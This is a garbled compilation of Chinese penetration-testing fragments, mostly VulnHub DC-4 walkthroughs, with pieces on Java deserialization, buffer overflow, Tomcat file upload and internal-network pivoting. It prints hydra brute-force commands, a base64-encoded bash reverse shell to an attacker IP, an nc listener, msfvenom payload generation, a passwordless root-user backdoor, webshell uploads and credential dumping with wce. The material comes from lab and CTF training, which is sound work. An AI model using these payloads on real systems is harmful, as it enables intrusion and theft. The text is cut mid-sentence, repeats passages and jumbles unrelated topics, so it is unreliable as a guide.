反序列化漏洞 1.序列化和反序列化 2.Java WEB中的序列化与反序列化 2.1 对象序列化和反序列化范例 3.Java中执行系统命令 3.1 重写readObject方法 4. 4.Apache Commons Collentions Apache Commons Collections 是一个扩展了Java标准库里集合类Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类 Runtime.getRuntime.exec(“xx”)可以执行系统命令 3.InvokerTransformer的transform()方法可以通过反射链调用Runtime.getRuntime.exec(“xx”)函数来执行系统命令 4. (2)再考察应用的Class Path中是否包含Apache Commons Collections库 (3)生成反序列化的payload (4)提交我们的payload数据
然后在目录里翻翻。在home目录里看到两个用户。在jim的用户目录里找到了密码的线索。
靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 可知开放22、80端口,linux主机 web是一个登录框 考虑万能密码 注入 爆破 渗透实战 : jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local ( may not run sudo on dc-4. Hope you enjoyed DC-4.
前言 过了许久我终于又写了一篇水文,这个DC-4也没什么技术含量,就当在复习下渗透吧 知识点总结,主要考察了三个知识点: 信息收集 hydra爆破ssh密码 teehee提权 信息收集 hydra爆破ssh密码 经过信息收集我们已经知道存在三个用户,但是在其他两个用户文件里并没有发现有用的信息,接下来对jim的密码来进行爆破 将jim写入到一个文件中,这里我命名为dc4user ,信息收集阶段发现的Old-passwd文件作为dc4pass。 接下来就是用hydra来进行爆破 hydra -L dc4user -P dc4pass 192.168.1.47 ssh 成功得到密码 image.png 使用ssh连接服务器 进去之后查看另外两个文件
DC系列第四个靶机,这系列的靶机设计的很不错,每个靶机环境都比较相似,但是每一个靶机都需要不同的技术和技巧,闲话不多说,下载地址:https://download.vulnhub.com/dc/DC-4.
0x01靶机概述 靶机基本信息: 靶机下载链接 https://download.vulnhub.com/dc/DC-4.zip 作者 DCAU 发布日期 2019年4月7日 难度 中等 0x02 ova的文件,然后我这里导入virtualBox中(建议把网络适配器修改为nat或者仅主机模式) 0x03靶机信息发现 1、主机发现 arp-scan -l 2、端口信息扫描 nmap -sV -T4 -n 192.168.56.104 0x04靶机渗透过程 1、我们可以访问一下80端口,发现有一个登录页面 2、尝试一下爆破密码, 爆破出密码为happy hydra -l admin -P rockyou.txt 上述命令的作用就是对目标服务器 192.168.1.165 的 /login.php 页面进行暴力破解登录,用户名为 admin,密码字典为 rockyou.txt 3、 使用账户密码登录,但是发现没有什么可视性的信息 4、 这里就提权成功了为root权限,最后查看一下/root/目录下的flag.txt文件 0x06渗透实验总结 1、第一点主要考察我们的信息手机,敏感文件的查看,一定要尝试多种思路 2、多抓一下包看看包文有没有可用的信息
第4个flag还是用老方法寻找突破口——edb调试。 简单分析一下反编译的汇编代码,发现在56556236处调用了levelFour!overflow,突破口应该就在这个过程中,继续调试。 ? 输入28个A和4个B并用edb进行调制,在levelFour!overflow返回之前设置断点,可以看到ffffd2ec处保存的为过程的返回地址5655623b ? 在执行后,发现并没有成功获得level4的shell,再次利用edb进行调试并查找问题。在levelFour!overflow返回之前,shellcode已经成功写入,跳转地址也没有问题。 ? 在edb中搜索shellcode的前4个字节,找到3个结果,第一个结果就是变量保存的位置。 ? 修改python脚本,重新运行程序。 ? 通过edb调试,可以看到跳转地址正确。 ? 接下来直接运行levelFour,成功拿到level4的shell。 ?
运行les.sh bash les.sh 利用[CVE-2017-16995] 进行提权 通过kali下载45010脚本 45010脚本没有执行的权限 添加权限 chmod 777 funbox4 /funbox4 由于kali的gcc 版本太高,编译出来文件在靶机中无法运行 也可以使用msf进行提权 先使用msfvenom 生成一个linux的反向shell的payload msfvenom
本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。
靶机介绍 这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 可知开放22、80端口,linux主机 web是一个登录框 考虑万能密码 注入 爆破 渗透实战 : jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local ( may not run sudo on dc-4. Hope you enjoyed DC-4.
databases; use "库名"; show tables; desc uesr; select 字段名 from 表名; insert into dou_admin value(1,2,3,4,5,6,7,8
靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标! host: 192.168.241.137 login: jim password: jibril04 登陆提示邮件,查看/var/mail查看邮件内有charles的密码 jim@dc-4: /var/mail$ cat jim From charles@dc-4 Sat Apr 06 21:15:46 2019 Return-path: <charles@dc-4> Envelope-to : jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local ( Exim 4.89) (envelope-from <charles@dc-4>) id 1hCjIX-0000kO-Qt for jim@dc-4; Sat
VulnHub DC-4 靶机渗透测试笔记靶机信息• 靶机名称:DC-4• 靶机来源:VulnHub• 目标:获取 root 权限,找到最终 flag• 难度:⭐⭐⭐☆☆(中等)• 涉及技术:信息收集、 | base64 -d | bashURL 编码版本: 1 echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE2OC4xMjgvNTY3OCAwPiYx %20%7C%20base64%20%2Dd%20%7C%20bashKali 监听: 12 nc -lvnp 5678成功监听到:五、后渗透信息收集5.1 查看基础信息5.2 7.2 查看邮件看一下之前打不开的 mbox:去邮箱里找,之前找到过 exim4 服务:Debian-exim:x:108:112::/var/spool/exim4:/bin/false/var/spool passwd这行意思是添加一个**没有密码、UID 为 0(root权限)**的用户 hack,然后: 123 su hackwhoami # root成功拿到 flag:九、渗透流程总结
实验目的:利用代理功能对2层网络进行渗透 测试靶机 ubantu 192.168.31.207 192.168.1.129 ubantu 192.168.1.100 /elf 成功获得一个会话连接 添加一个路由 run autoroute -s 192.168.1.0/24 本地设置socks4代理 use auxiliary/server/ socks4a set SRVPORT 9999 开启新的终端 编辑 vim /etc/proxychains.conf 将设置的socks4添加进末尾 代理打开firefox 访问 PHP,php3 添加新文章上传php大马 直接拖拽成功上传后,可以查看路径,直接访问地址 由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具
目标主机信息搜集的深度,决定后渗透权限持续把控。 渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。 持续渗透的本质是线索关联,而线索关联为后续的攻击链方提供了强大的方向。 后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。 靶机背景介绍: ? 引言(2): 渗透测试过程,提权是非核心任务,这里也不建议尝试提权,因为在实战过程中获取某个“点”的权限,过程是及其漫长以及困难的,不要因为某个大胆的尝试,而影响了整个渗透测试流程。 引言(4): 渗透的本质是信息搜集,而要把信息搜集发挥最大效果,一定是离不开“线索关联”,而信息搜集,无论是对内,对外,更或者是主动信息搜集,被动信息搜集。 后者的话: APT攻击三大要素,既:攻击手段复杂,持续时间长,高危害性 APT攻击主要分类为两大类,既:高级持续渗透 , 即时渗透 ? ? ? ? APT两大类攻击核心诉求区别: ?
本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。
4、HTTP的连接很简单,是无状态的;HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议,比HTTP协议安全。 SSL协议组成1、记录协议(Record Protocol)2、握手协议(Handshake Protocol)3、警告协议(Alert Protocol)4、密码规范改变协议(Change Cipher 本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的,并可能违反《中华人民共和国网络安全法》及相关法律法规。
Tomcat渗透 Tomcat任意文件写入(CVE-2017-12615) 影响范围 Apache Tomcat7.0.0-7.0.81(默认配置) 复现 这边我用vulhub sudo service =strSysProperty[languageNo]%>
联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架 [image-20211224190525232.png] [image-20211224190530749.png] 使用payload 段的路由 bg route add 10.0.1.0 255.255.255.0 1 route print [image-20211225103435896.png] 然后配置proxychain4. image-20211225103602973.png] 我们在之前已经知道了内网主机的ip,那么这里我们直接使用proxychain配合nmap对10.0.1.7的端口进行扫描 proxychains4 servicePrincipalName属性 将机器账户的sAMAccountName,更改为DC的机器账户名字,注意后缀不带$ 为机器账户请求TGT 将机器账户的sAMAccountName更改为其他名字,不与步骤3重复即可 通过S4U2self
本文将通过一些实例,分享一些简单的内网渗透思路。 0x02 信息收集 首先,对服务器资产信息进行收集,了解哪些ip是存活的,存活的ip开放了哪些端口,以及端口所对应的服务。 (4)上传wce密码获取工具,在webshell中直接执行wce.exe -w顺利获取管理员密码 ? (5)登录服务器及域服务器 ? ? 0x03 Web应用渗透 通过服务器资产探测,可收集服务器开放web端口,内网系统中,大部分web系统访问的界面都是登录界面,需要用户名密码进行认证。以某内网系统为例,进行实际渗透测试。 (4)通过抓包修改文件后缀,成功上传aspx木马,刷新页面获取图片链接 ? (5)访问aspx木马地址,查看当前权限,需进一步提权 ? (6)上传exp到可读可写目录,尝试执行 ? 致力于分享原创高质量干货,包括但不限于:渗透测试、WAF绕过、代码审计、安全运维。